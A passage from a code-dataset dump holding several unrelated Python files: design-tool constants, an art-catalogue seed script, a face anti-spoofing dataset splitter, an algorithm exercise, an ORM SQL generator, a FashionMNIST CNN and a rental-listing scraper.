(overall_results_directory,'database.json')\nfeedback_barrier_base = os.path.join(interface_images, 'feedback_barrier_base.jpg')\nfeedback_canal_base = os.path.join(interface_images, 'feedback_canal_base.jpg')\nfeedback_noise_base = os.path.join(interface_images, 'feedback_noise_base.jpg')\nfeedback_barrier = os.path.join(interface_images, 'feedback_barrier.jpg')\nfeedback_canal = 
os.path.join(interface_images, 'feedback_canal.jpg')\nfeedback_noise = os.path.join(interface_images, 'feedback_noise.jpg')\ndraw_no_lines_drawn = os.path.join(interface_images, 'draw_no_lines_drawn.jpg')\nbase_canal_calculation = os.path.join(interface_images, 'base_canal_calculation.jpg')\nbase_noise_calculation = os.path.join(interface_images, 'base_noise_calculation.jpg')\n\n# ------------------------------------------------------------------------------------\n# Generic data on image size and typical colours\n# ------------------------------------------------------------------------------------\nwebsite_colour = (29, 41, 82)\nthreshold_distance = 20 # threshold for snapping lines into origin points\nn_neighbours = 2 # neighbours for style recommendation\n\n# size of canvas\nshape_x = 700\nshape_y = 700\n\n# line colors\ncolor_lines = (0,0,0)\ncolor_lines_cv2 = (0,0,0)\n\n\n# ------------------------------------------------------------------------------------\n# Color and line thickness definition. Coordinate with drawscapes_scripts.js\n# ------------------------------------------------------------------------------------\n# Use the color picker in https://www.google.com/search?q=color+picker\n# height in storeys of building massing according to layers\n# height is measured from the ground, ie, it is NOT stacked in the calculation\n# thickness of lines measured in pixels. To get actual width multiply * site_scale_factor\ncolor_canvas_rgb = [[0,0,0],[230, 196, 138],[255, 110, 94],[255, 0, 0],[186, 163, 13], [112, 48, 160],[204, 102, 24], [44, 112, 15]]\nthickness_lines = [5,30,22,15, 10, 10, 10, 10]\nmassing_height = [0,2,5,10, 0, 0, 0, 10] # last two colours will appear in the massing calc but the function will loop over all colors incl land uses\n\n\n# ------------------------------------------------------------------------------------\n# Definition of exercises carried out during the interface use and how they are saved in the database\n# ------------------------------------------------------------------------------------\nexercises = ['lines','massing','land_uses']\n\n\n# ------------------------------------------------------------------------------------\n# Site specific geometric data\n# ------------------------------------------------------------------------------------\nnode_coords = [[146,227],\n[201,212],\n[393,160],\n[454,144],\n[469,186],\n[535,307],\n[584,371],\n[410,547],\n[344,567]]\n\nnode_coords_bridge = [[469,186], [535,307], [344,567]] # these are nodes that lead to connections under the DLR bridge\n\n#detailed shape of polygon to draw montage. 
May incluide more points than coords\nnode_coords_detailed=[[146,227],\n[201,212],\n[393,160],\n[454,144],\n[469,186],\n[535,307],\n[584,371],\n[410,547],\n[344,567],\n[226,438],\n[146,273]]\n\n# Factor that relates pixel size to meters = diagonal_meters / diagonal_pixels\nsite_scale_factor = 250/461\n\n# data on UCL EAST development\nucl_east_development_area = 134700\nucl_east_student_population = 500\nucl_east_research_area = 5000\n\n# data for conversion of massign m2 to land uses\nratio_accomodation_base = 0\nratio_accomodation_plinth = 0.3\nratio_accomodation_tower = 0.7\nm2accomodation_per_student = 15\nratio_research_base = 0.5\nratio_research_plinth = 0.3\nratio_research_tower = 0","sub_path":"project_data.py","file_name":"project_data.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"371986128","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom formific_models import Base, User, Medium, ArtItem\n\nengine = create_engine('postgresql://formific:formific@localhost/formific')\nBase.metadata.drop_all(engine)\nBase.metadata.create_all(engine)\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n# Create the first user\nuser1 = User(name='Yshia Wallace', email='yshiawallace@gmail.com')\nsession.add(user1)\nsession.commit()\n\n# Create media categories\nmedium1 = Medium(name='Painting')\nsession.add(medium1)\nsession.commit()\n\nmedium2 = Medium(name='Drawing')\nsession.add(medium2)\nsession.commit()\n\nmedium3 = Medium(name='Sculpture')\nsession.add(medium3)\nsession.commit()\n\nmedium4 = Medium(name='Video')\nsession.add(medium4)\nsession.commit()\n\nmedium5 = Medium(name='Photography')\nsession.add(medium5)\nsession.commit()\n\nmedium6 = Medium(name='Ceramics')\nsession.add(medium6)\nsession.commit()\n\nmedium7 = Medium(name='Installation')\nsession.add(medium7)\nsession.commit()\n\n# Create art items\nitem1 = ArtItem(\n name='Rachel',\n description='A scene from the story of Rachel by MH Tse.',\n material='Gouache on Arches',\n image_url='http://www.yshiawallace.com/files/gimgs/33_gouacherachel.jpg', # noqa\n video_url=\"\",\n year='2013',\n medium=medium1,\n user_id=1\n )\nsession.add(item1)\nsession.commit()\n\nitem2 = ArtItem(\n name='Homecoming',\n description='Another scene from the story of Rachel by MH Tse.',\n material='Gouache on Arches',\n image_url='http://www.yshiawallace.com/files/gimgs/33_gouachehomecoming.jpg', # noqa\n video_url=\"\",\n year='2013',\n medium=medium1,\n user_id=1\n )\nsession.add(item2)\nsession.commit()\n\nitem3 = ArtItem(\n name='Cairns',\n description=(\n 'This is part of a series of drawings called \"Cairns\".'\n 'As adults we become inured to the passage of time.'\n 'Each day blends into the next without definition.'\n 'By documenting a scene from each day,'\n 'I attempted to give the day definition,'\n 'and in this way expand or slow my perception of time passing.'\n 'Each scene is an anchor in time.'\n ),\n material='India ink on dot matrix paper',\n image_url='http://www.yshiawallace.com/files/gimgs/36_cairns-03.jpg',\n video_url=\"\",\n year='2013',\n medium=medium2,\n user_id=1\n )\nsession.add(item3)\nsession.commit()\n\nitem4 = ArtItem(\n name='Cairns',\n description=(\n 'This is part of a series of drawings called \"Cairns\".'\n 'As adults we become inured to the passage of time.'\n 'Each day blends into the next without definition.'\n 'By documenting a scene from each day, I attempted 
to give'\n 'the day definition, and in this way expand or slow my'\n 'perception of time passing. Each scene is an anchor in time.'\n ),\n material='India ink on dot matrix paper',\n image_url='http://www.yshiawallace.com/files/gimgs/36_cairns-04.jpg',\n video_url=\"\",\n year='2013',\n medium=medium2,\n user_id=1\n )\nsession.add(item4)\nsession.commit()\n\nitem5 = ArtItem(\n name='Jane Doe',\n description='A weapon for women walking alone at night.',\n material='Bronze',\n image_url='http://www.yshiawallace.com/files/gimgs/14_janedoe.jpg',\n video_url=\"\",\n year='2009',\n medium=medium3,\n user_id=1\n )\nsession.add(item5)\nsession.commit()\n\nitem6 = ArtItem(\n name='Jane Doe',\n description=(\n 'A bronze sculpture of a mole rat. It is 8 x 2 inches'\n 'and has an opaque white patina. A wax cast of wrinkled'\n 'cling film was used to create the skin texture of the rat.'\n ),\n material='Bronze',\n image_url='http://www.yshiawallace.com/files/gimgs/11_molerats6.jpg',\n video_url=\"\",\n year='2009',\n medium=medium3,\n user_id=1\n )\nsession.add(item6)\nsession.commit()\n\nitem7 = ArtItem(\n name='Trees',\n description=(\n 'A video based on a short poem about one person'\n 're-experiencing bits of consciousness as they'\n 'fade then flow away. Narrated by Penelope Michaelides,'\n 'written by Man Ha Tse,'\n 'directed by Yshia Wallace & Man Ha Tse,'\n 'edited by Yshia Wallace.'\n ),\n material='Animation',\n image_url='http://yshiawallace.com/images/trees-thumbnail-1.png',\n video_url=\"https://vimeo.com/user18914778/trees\",\n year='2014',\n medium=medium4,\n user_id=1\n )\nsession.add(item7)\nsession.commit()\n\nitem8 = ArtItem(\n name='Live Feed',\n description=(\n 'This is the first animated movie I made using After Effects.'\n 'I scanned one of my drawings and torn japanese paper'\n 'and manipulated them as layers in AE. Music is by'\n 'Michael Nyman - a track called \"Wheelbarrow Walk.\"'\n ),\n material='Animation',\n image_url='http://yshiawallace.com/images/live-feed-thumbnail.png',\n video_url=\"https://vimeo.com/5039152\",\n year='2010',\n medium=medium4,\n user_id=1\n )\nsession.add(item8)\nsession.commit()\n","sub_path":"formificApp/formificApp/starter_items.py","file_name":"starter_items.py","file_ext":"py","file_size_in_byte":5505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"44452500","text":"# standardlib\nimport csv\nimport re\nfrom pathlib import Path\nfrom typing import List, Tuple, Callable\n\n# external package\nimport numpy as np\nfrom sklearn.model_selection import StratifiedShuffleSplit\nimport pandas as pd\nimport cv2\nimport torch\nfrom torchvision import transforms, datasets\nfrom torch.utils.data import Dataset\n\n# user\nfrom etl.base.dataset import BaseDataset\n\nclass Extract(BaseDataset):\n\tdef __init__(self, parent_directory: str, \n\t\t\t\t extension: str,\n\t\t\t\t labels: List[str], \n\t\t\t\t training_size: float, \n\t\t\t\t random_state: int, \n\t\t\t\t verbose: bool) -> None:\n\t\t\"\"\"Class for creating csv files of train, validation, and test\n\n\t\tParameters\n\t\t----------\n\t\tparent_directory\n\t\t\tThe parent_directory folder path. 
It is highly recommended to use Pathlib\n\t\textension\n\t\t\tThe extension we want to include in our search from the parent_directory directory\n\t\tlabels\n\n\t\tReturns\n\t\t-------\n\t\tNone\t\n\t\t\"\"\"\n\t\tsuper().__init__(parent_directory, extension)\n\t\tself.labels = labels\n\t\tself.training_size = training_size\n\t\tself.test_size = 1 - training_size\n\t\tself.random_state = random_state\n\t\tself.verbose = verbose\n\n\tdef _create_dataset_array(self) -> Tuple[np.ndarray, np.ndarray]:\n\t\t\"\"\"Sklearn stratified sampling uses a whole array so we must build it first\n\n\t\tParameters\n\t\t----------\n\t\tNone\n\n\t\tReturns\n\t\t-------\n\t\tTuple of X and y\t\n\t\t\"\"\"\n\t\ttarget = []\n\t\tname = []\n\t\t\n\t\tfor parent_directory in self.read_files():\n\t\t\tchild = parent_directory.parts[len(self.parent_directory.parts):]\n\t\t\tchild = '/'.join(str(part) for part in child)\n\t\t\tfor encoded_label, label in enumerate(self.labels):\n\t\t\t\tif re.search(label, child):\n\t\t\t\t\tname.append(str(child))\n\t\t\t\t\ttarget.append(encoded_label)\n\t\tif self.verbose:\n\t\t\tprint(\"Finished creating whole dataset array\")\n\n\t\treturn np.array(name), np.array(target)\n\n\tdef _stratify_sampling(self) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n\t\t\"\"\"Sklearn stratified sampling uses a whole array so we must build it first\n\n\t\tParameters\n\t\t----------\n\t\tNone\n\n\t\tReturns\n\t\t-------\n\t\tTuple of train(X, y), validation(X, y), and test(X, y)\t\n\t\t\"\"\"\n\t\tx, y = self._create_dataset_array()\n\t\tsss = StratifiedShuffleSplit(n_splits=1, train_size=self.training_size, test_size=self.test_size, random_state=self.random_state)\n\n\t\tfor train_index, validation_test_index in sss.split(x, y):\n\t\t\tx_train, x_validation_test = x[train_index], x[validation_test_index]\n\t\t\ty_train, y_validation_test = y[train_index], y[validation_test_index]\n\n\t\tsss = StratifiedShuffleSplit(n_splits=1, train_size=0.5, test_size=0.5,random_state=self.random_state)\n\t\tfor validation_index, test_index in sss.split(x_validation_test, y_validation_test):\n\t\t\tx_validation, x_test = x_validation_test[validation_index], x_validation_test[test_index]\n\t\t\ty_validation, y_test = y_validation_test[validation_index], y_validation_test[test_index]\n\n\t\ttrain = np.c_[x_train, y_train]\n\t\tvalidation = np.c_[x_validation, y_validation]\n\t\ttest = np.c_[x_test, y_test]\n\n\t\tif self.verbose:\n\t\t\tprint(\"Finished splitting dataset into train, validation, and test\")\n\t\treturn train, validation, test\n\n\tdef extract(self, filename: str, save_path: str):\n\t\t\"\"\"Create csv file of train, validation, and test\n\n\t\tParameters\n\t\t----------\n\t\tfilename\n\t\t\tThe prefix of train, validation, and test filename\n\t\t\tHave the format of filename_train.csv, filename_validation.csv, and test_validation.csv\n\t\tsave_path\n\t\t\tThe parent_directory folder name of filename_train.csv, filename_validation.csv, and test_validation.csv\n\n\t\tReturns\n\t\t-------\n\t\ttrain, validation, and test csv with the following name:\n\t\tfilename_train.csv, filename_validation.csv, and test_validation.csv\t\n\t\t\"\"\"\n\t\ttrain, validation, test = self._stratify_sampling()\n\n\t\tsave_into = Path.cwd() / save_path\n\t\tsave_into.mkdir(parents=True, exist_ok=True)\n\n\t\twith open(f'{save_path}/{filename}_train.csv', 'w') as writer:\n\t\t\tcsv_writer = csv.writer(writer)\n\t\t\tfor row in train:\n\t\t\t\tcsv_writer.writerow(row)\n\n\t\tif self.verbose:\n\t\t\tprint(f'Finished 
writing {filename}_train.csv into {save_into}')\n\t\t\n\n\t\twith open(f'{save_path}/{filename}_validation.csv', 'w') as writer:\n\t\t\tcsv_writer = csv.writer(writer)\n\t\t\tfor row in validation:\n\t\t\t\tcsv_writer.writerow(row)\n\n\t\tif self.verbose:\n\t\t\tprint(f'Finished writing {filename}_validation.csv into {save_into}')\n\n\t\twith open(f'{save_path}/{filename}_test.csv', 'w') as writer:\n\t\t\tcsv_writer = csv.writer(writer)\n\t\t\tfor row in test:\n\t\t\t\tcsv_writer.writerow(row)\n\n\t\tif self.verbose:\n\t\t\tprint(f'Finished writing {filename}_test.csv into {save_into}')\n\nclass TransformAndLoad(Dataset):\n\tdef __init__(self, parent_directory: str, \n\t\t\t\t extension: str, \n\t\t\t\t csv_file: str, \n\t\t\t\t transform: Callable = None) -> None:\n\t\t\"\"\"Class for reading csv files of train, validation, and test\n\n\t\tParameters\n\t\t----------\n\t\tparent_directory\n\t\t\tThe parent_directory folder path. It is highly recommended to use Pathlib\n\t\textension\n\t\t\tThe extension we want to include in our search from the parent_directory directory\n\t\tcsv_file\n\t\t\tThe path to csv file containing X and y\n\t\tTransform\n\t\t\tCallable which apply transformations\n\n\t\tReturns\n\t\t-------\n\t\tNone\t\n\t\t\"\"\"\n\t\tself.parent_directory = parent_directory\n\t\tself.extension = extension\n\t\tself.csv_file = pd.read_csv(csv_file)\n\t\tself.transform = transform\n\t\n\tdef __len__(self) -> int:\n\t\t\"\"\"Return the length of the dataset\n\n\t\tParameters\n\t\t----------\n\t\tparent_directory\n\t\t\tThe parent_directory folder path. It is highly recommended to use Pathlib\n\t\textension\n\t\t\tThe extension we want to include in our search from the parent_directory directory\n\t\tcsv_file\n\t\t\tThe path to csv file containing X and y\n\t\tTransform\n\t\t\tCallable which apply transformations\n\n\t\tReturns\n\t\t-------\n\t\tLength of the dataset\t\n\t\t\"\"\"\n\t\treturn len(self.csv_file)\n\n\tdef __getitem__(self, idx: int) -> Tuple[np.ndarray, np.ndarray]:\n\t\t\"\"\"Return the X and y of a specific instance based on the index\n\n\t\tParameters\n\t\t----------\n\t\tidx\n\t\t\tThe index of the instance \n\n\t\tReturns\n\t\t-------\n\t\tTuple of X and y of a specific instance\t\n\t\t\"\"\"\n\t\tparent_directory = self.parent_directory / self.csv_file.iloc[idx, 0]\n\t\ttarget = self.csv_file.iloc[idx, 1]\n\t\tparent_directory = cv2.imread(str(parent_directory))\n\n\t\tif self.transform:\n\t\t\tparent_directory = self.transform(parent_directory)\n\n\t\treturn parent_directory, target\n\n\ndef main():\n\n\t# create training, validation, and test csv\n\tparent_directory = Path.cwd() / 'data' \n\ta = Extract(parent_directory, \"jpg\", [\"attack\", \"real\"], 0.8, 69, verbose=True)\n\ta.extract(filename=\"mfsd\", save_path=\"data/mfsd\")\n\n\t# check individual dataset\n\tmfsd_train_csv = str(parent_directory / \"mfsd\" / \"mfsd_train.csv\")\n\n\tdata_transform = transforms.Compose([\n\ttransforms.ToPILImage(),\n\ttransforms.RandomResizedCrop(224),\n\ttransforms.RandomHorizontalFlip(),\n\ttransforms.ToTensor(),\n\ttransforms.Normalize(\n\t\t\t\t\t\tmean=[0.485, 0.456, 0.406],\n\t\t\t\t\t\tstd=[0.229, 0.224, 0.225])\n\t])\n\n\tc = TransformAndLoad(parent_directory=parent_directory, extension=\"jpg\", csv_file=mfsd_train_csv, transform=data_transform)\n\tprint(c.__getitem__(0))\n\n\nif __name__ == 
\"__main__\":\n\tmain()","sub_path":"torchetl/.ipynb_checkpoints/etl-checkpoint.py","file_name":"etl-checkpoint.py","file_ext":"py","file_size_in_byte":7019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"495956948","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nmain = list()\ns, p = [int(i) for i in input().split()]\n\nfor i in range(s):\n x, y = [int(i) for i in input().split()]\n main.append((x,'mark1'))\n main.append((y,'mark2'))\n \npoint = input().split()\nfor i in point:\n main.append((int(i),'p'))\n \nmain.sort()\n\nsegment = 0\npointsegdict = dict()\nfor i in main:\n if i[1] == 'mark1': segment += 1\n elif i[1] == 'mark2': segment -= 1\n else: \n pointsegdict[i[0]] = segment\n\nfill = ''\nfor i in point:\n fill += str(pointsegdict[int(i)]) + ' '\nprint(fill[:-1])\n","sub_path":"Algorithmic Toolbox/Solutions/Partha/Week 4/lott.py","file_name":"lott.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"73308670","text":"from LightMagic.db._sql_generator import _SqlGenerator\nfrom ._Tools import _Tools\n\n\nclass _Model(_Tools, _SqlGenerator):\n \"\"\" Базовая модель \"\"\"\n\n # Исключает из модели БД следующие параметры\n _exclude_from_db_model = []\n\n # Список полей, отдаваемый при выводе списка. Опциональный параметр. Если пустой список - возвращает все.\n _list_fields = []\n\n _model_fields = None\n\n def __init__(self, db, debug_mode=False):\n\n # Соединение с БД\n self.db = db\n\n # В случае True - для данной модели будут печататься запросы в БД и выводиться список аргументов.\n self.debug_mode = debug_mode\n\n # Сюда загружаем(кэшируем) список полей в модели\n self._model_fields = None\n\n # Автоматически заполняется при первом запросе\n self._primary_key = []\n\n # Добавляем стандартные имена-исключения\n fields_to_exclude = ['db', 'debug_mode'] # TODO should be defined at class-level\n for field_name in fields_to_exclude:\n if field_name not in self._exclude_from_db_model:\n self._exclude_from_db_model.append(field_name)\n\n # Флаг сохранения в БД. НЕ ПРОВЕРЯЕТСЯ В БД. Меняется на основе методов load/create\n self._is_created = False\n\n self._light_magic_values = {}\n\n def get_table_name(self):\n \"\"\" Возвращает имя таблицы. Необходимо переопределить. 
\"\"\"\n raise ValueError\n\n def get_model_fields(self, force_reload=False):\n \"\"\" Возвращает поля модели \"\"\"\n if self._check_cache('model_fields') is None and force_reload is False:\n model_fields_t = tuple(filter(\n lambda x: (x if not str(x).startswith('_') and not callable(\n getattr(self, x)) and x not in self._exclude_from_db_model else None), dir(self)))\n\n model_fields = {key: self.__class__.__dict__[key].__class__ for key in model_fields_t}\n self._set_cache('model_fields', model_fields)\n\n return self._get_cache('model_fields')\n\n @classmethod\n def _dig_class(cls, key, oclass):\n if key in oclass.__dict__:\n return oclass.__dict__[key]\n else:\n for p_class in oclass.__bases__:\n if p_class == object:\n continue\n elif key in p_class.__dict__:\n return p_class.__dict__[key]\n else:\n return cls._dig_class(key, p_class)\n raise AttributeError('Key %s not found' % key)\n\n def get_additional_parametr(self, key, parament):\n \"\"\" Возвращает информацию о расширенном параметре \"\"\"\n # Добавить кэширование\n keyobject = self._dig_class(key, self.__class__)\n return getattr(keyobject, parament)\n\n def _get_primary_keys(self):\n \"\"\" Возвращает первичный ключ \"\"\"\n if self._check_cache('primary_keys') is None:\n if len(self._primary_key) == 0:\n for key in self.get_model_fields():\n # Проверяем, что данный ключ является первичным ключем (возможно составным):\n try:\n if self.get_additional_parametr(key, 'db_primary_key') is True:\n self._primary_key.append(key)\n except:\n # Первичный ключ не задан\n pass\n\n self._set_cache('primary_keys', self._primary_key)\n else:\n self._primary_key = self._get_cache('primary_keys')\n\n return self._primary_key\n\n def _create(self):\n \"\"\" Создает объект в БД \"\"\"\n data = []\n values = []\n fields = []\n for key in self.get_model_fields():\n if key in self._get_primary_keys():\n if self.get_additional_parametr(key, 'db_force_set_primary_key') is False:\n continue\n\n # Получаем исходное значение\n value = getattr(self, key)\n\n # Проверяем, что значение None\n if value is None:\n # Если default значение None\n value = self.get_additional_parametr(key, 'db_default_value')\n if value is None:\n continue\n\n # Получаем тип в БД\n db_type = self.get_additional_parametr(key, 'get_db_type')()\n if db_type is None:\n values.append('%s')\n else:\n values.append('%%s::%s' % (db_type))\n\n # Приводим значение к типу БД\n data.append(self.get_additional_parametr(key, 'db_serialize')(value))\n\n # Добавляем наименование поля\n fields.append(key)\n\n query = 'INSERT INTO {table_name} ({fields}) VALUES({values}) {index_keys}'.format(\n table_name=self.get_table_name(),\n fields=','.join(fields),\n values=','.join(values),\n index_keys=('RETURNING %s' % ','.join(self._get_primary_keys())) if len(\n self._get_primary_keys()) > 0 else ''\n )\n\n self._debug('create', query, data)\n\n return query, data\n\n def _get_list(self, fields=None, limit=100, offset=0, filter_condition=None, order_by=None, order_type='ASC'):\n \"\"\" Возвращает список записей \"\"\"\n\n if fields is None:\n fields = self.get_model_fields()\n # Делаем хитрый момент, для того, чтобы проверить - корректны ли все запрошенные поля\n else:\n for x in fields:\n if x not in self.get_model_fields():\n raise ValueError('Неверно заданы поля fields')\n\n where, data = self._parse_filter(filter_condition)\n\n # Формируем сортировку\n order_by_str = ''\n if order_by is not None:\n order_by_str = 'ORDER BY {order_by} {order_type}'.format(\n order_by=order_by,\n 
    def _get_list(self, fields=None, limit=100, offset=0, filter_condition=None, order_by=None, order_type='ASC'):\n        \"\"\" Returns a list of records \"\"\"\n\n        if fields is None:\n            fields = self.get_model_fields()\n        # Otherwise verify that all of the requested fields are valid\n        else:\n            for x in fields:\n                if x not in self.get_model_fields():\n                    raise ValueError('Invalid fields requested')\n\n        where, data = self._parse_filter(filter_condition)\n\n        # Build the ordering\n        order_by_str = ''\n        if order_by is not None:\n            order_by_str = 'ORDER BY {order_by} {order_type}'.format(\n                order_by=order_by,\n                order_type=order_type\n            )\n        # Limits\n        limit_str = ''\n        if limit is not None:\n            limit_str = 'LIMIT {limit} OFFSET {offset}'.format(\n                limit=int(limit),\n                offset=int(offset),\n            )\n\n        # Build the query\n        query = 'SELECT {fields} FROM {table_name} {where} {order_by_str} {limit_str}'.format(\n            fields=', '.join(fields),\n            table_name=self.get_table_name(),\n            order_by_str=order_by_str,\n            limit_str=limit_str,\n            where='WHERE %s' % ' AND '.join(where) if len(where) > 0 else ''\n        )\n\n        self._debug('get_list', query, data)\n\n        return query, data\n\n    def _load(self, fields=None, by_primary_key=True, filter_condition=None):\n        \"\"\" Loads the model's data \"\"\"\n        if filter_condition is not None:\n            where, data = self._parse_filter(filter_condition)\n\n        # Search by primary key:\n        elif by_primary_key is True:\n            where = []\n            data = []\n            for key in self._get_primary_keys():\n                where.append('%s=%%s' % key)\n                data.append(self.get_additional_parametr(key, 'db_serialize')(getattr(self, key)))\n        else:\n            raise Exception('Provide conditions for loading the object')\n\n        if fields is None:\n            fields = self.get_model_fields()\n\n        query = 'SELECT {fields} FROM {table_name} WHERE {where}'.format(\n            fields=','.join(fields),\n            table_name=self.get_table_name(),\n            where=' AND '.join(where)\n        )\n        self._debug('load', query, data)\n\n        return query, data, fields\n\n    def _remove(self):\n        \"\"\" Deletes the object \"\"\"\n        where = []\n        data = []\n        # Search by primary key:\n        for key in self._get_primary_keys():\n            where.append('%s=%%s' % key)\n            data.append(self.get_additional_parametr(key, 'db_serialize')(getattr(self, key)))\n        if len(data) == 0:\n            raise PermissionError('Error Primary Key')\n\n        query = \"\"\"DELETE FROM {table_name} WHERE {primary_key}\"\"\".format(\n            table_name=self.get_table_name(),\n            primary_key=' AND '.join(where)\n        )\n\n        self._debug('remove', query, data)\n\n        return query, data\n\n    def _update(self):\n        \"\"\" Updates the object \"\"\"\n        keys = []\n        if self._check_cache('update_keys') is None:\n            # Exclude primary keys from the update\n            updated_fields = list(filter(lambda x: x not in self._get_primary_keys(), self.get_model_fields()))\n            # WHERE\n            where = []\n            sub_query = []\n\n            for key in updated_fields:\n                db_type = self.get_additional_parametr(key, 'get_db_type')()\n                if db_type is None:\n                    sub_query.append('{key}=%s'.format(key=key))\n                else:\n                    sub_query.append('{key}=%s::{type}'.format(key=key, type=db_type))\n                keys.append(key)\n\n            # Search by primary key:\n            for key in self._get_primary_keys():\n                where.append('%s=%%s' % key)\n                keys.append(key)\n\n            query = \"\"\"UPDATE {table_name} SET {fields} WHERE {where}\"\"\".format(\n                table_name=self.get_table_name(),\n                fields=', '.join(sub_query),\n                where=' AND '.join(where)\n            )\n            self._set_cache('update_query', query)\n            self._set_cache('update_keys', keys)\n\n        # Fill in the data\n        data = []\n        for key in self._get_cache('update_keys'):\n            value = getattr(self, key)\n            if value is None:\n                value = self.get_additional_parametr(key, 'db_default_value')\n\n            data.append(self.get_additional_parametr(key, 'db_serialize')(value))\n\n        # Make sure data was actually loaded and there are constraints\n        if len(data) == 0:\n            raise PermissionError('Error Primary Key')\n\n        self._debug('update', self._get_cache('update_query'), data)\n        return self._get_cache('update_query'), data\n\n    def _set_cache(self, key, value):\n        if self.__class__._compiled_queryies is None:\n            self.__class__._compiled_queryies = {}\n\n        self.__class__._compiled_queryies[key] = value\n\n
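    # Editor's note: the cache helpers below store compiled SQL per model *class*\n    # (on self.__class__), so a statement such as the UPDATE built in _update() is\n    # assembled once and shared by every instance; only the parameter data list is\n    # rebuilt on each call.\n\n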
    def _get_cache(self, key):\n        if self.__class__._compiled_queryies is None:\n            self.__class__._compiled_queryies = {}\n\n        return self.__class__._compiled_queryies[key]\n\n    def _check_cache(self, key):\n        if '_compiled_queryies' not in self.__class__.__dict__:\n            self.__class__._compiled_queryies = {}\n\n        return self.__class__._compiled_queryies.get(key)\n","sub_path":"LightMagic/db/_Model.py","file_name":"_Model.py","file_ext":"py","file_size_in_byte":11697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"162528173","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ntrainSet = torchvision.datasets.FashionMNIST(\n    root = \"./data/FashionMNIST\", #Extract\n    train = True, #Extract\n    download = True, #Extract\n    transform = transforms.Compose([ #Transform\n        transforms.ToTensor()\n    ])\n)\n\nclass Network(nn.Module):\n    def __init__(self):\n        super(Network, self).__init__()\n        # Convolutional transformations\n        # Make sure the number of out_channels keeps increasing\n        self.conv1 = nn.Conv2d(in_channels = 1, out_channels = 6, kernel_size = 5)\n        self.conv2 = nn.Conv2d(in_channels = 6, out_channels = 12, kernel_size = 5)\n\n        # Fully Connected layers\n        # Make sure the number of out_features keeps decreasing\n        self.fc1 = nn.Linear(in_features = 12*4*4, out_features = 120)\n        self.fc2 = nn.Linear(in_features = 120, out_features = 60)\n        self.out = nn.Linear(in_features = 60, out_features = 10)\n\n    def forward(self, t):\n        # Implementation of layers\n        # (1) input layer\n        t = t\n\n        # (2) hidden conv layer 1\n        t = self.conv1(t)\n        t = F.relu(t)\n        t = F.max_pool2d(t, kernel_size = 2, stride = 2)\n\n        # (3) hidden conv layer 2\n        t = self.conv2(t)\n        t = F.relu(t)\n        t = F.max_pool2d(t, kernel_size = 2, stride = 2)\n\n        # (4) hidden linear layer 1\n        t = t.reshape(-1, 12*4*4)\n        t = self.fc1(t)\n        t = F.relu(t)\n\n
        # (5) hidden linear layer 2\n        t = self.fc2(t)\n        t = F.relu(t)\n\n        # (6) output linear layer\n        t = self.out(t)\n        # Normally you would apply a softmax at the output layer after the series of relu operations.\n        # The loss/cost function we are going to apply already uses the softmax implicitly.\n        #t = F.softmax(t, dim = 1)\n        return t\n\nnetwork = Network()\nsample = next(iter(trainSet))\nimage, label = sample\npred = network(image.unsqueeze(0))\npred","sub_path":"pytorch.py","file_name":"pytorch.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"106229178","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n'''\n\n@author: lenspace\n\n@license: (C) Copyright 2017-2018.\n\n@contact: ustbenspace@gmail.com\n\n@file: fang1.py\n\n@time: 2018/3/31 11:11 PM\n\n@desc:\n\n'''\n\nfrom pymongo import MongoClient\nimport requests\nfrom fake_useragent import UserAgent\nfrom lxml import etree\nimport time\n\n\nclient = MongoClient()\ndb = client.fang\ntable_one = db.one\ntb_two = db.two\n\nua = UserAgent()\nhost = 'http://zu.fang.com'\n\ndef mylog(msg):\n    print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) + ': ' + msg)\n\ndef getHTMLText(url):\n    try:\n        headers = {\n            'User-Agent' : ua.random,\n        }\n\n        r = requests.get(url, headers=headers, timeout=20)\n        sc = r.status_code\n        print(sc)\n        r.raise_for_status()\n        r.encoding = r.apparent_encoding\n        return r.text\n    except:\n        return url + \" raised an exception\"\n\nif __name__ == '__main__' :\n    i = 1\n    datas = table_one.find()\n    for data in datas:\n        mylog('crawling page {0}'.format(i))\n        i += 1\n\n        area = data['area']\n        url = data['url']\n        mylog('url is ' + url)\n        data.pop('_id')\n\n        html = getHTMLText(url)\n        s = etree.HTML(html)\n        subareas = s.xpath('//*[@id=\"rentid_D04_08\"]/a[position()!=1]/text()')\n        subhrefs = s.xpath('//*[@id=\"rentid_D04_08\"]/a[position()!=1]/@href')\n\n        length = len(subareas)\n        mylog('the current page has {0} elements'.format(length))\n\n        j = 0\n        while j < length:\n            newData = {}\n            newData['area'] = area\n            newData['subarea'] = subareas[j]\n            newData['url'] = host + subhrefs[j]\n            tb_two.insert(newData)\n            j += 1\n\n
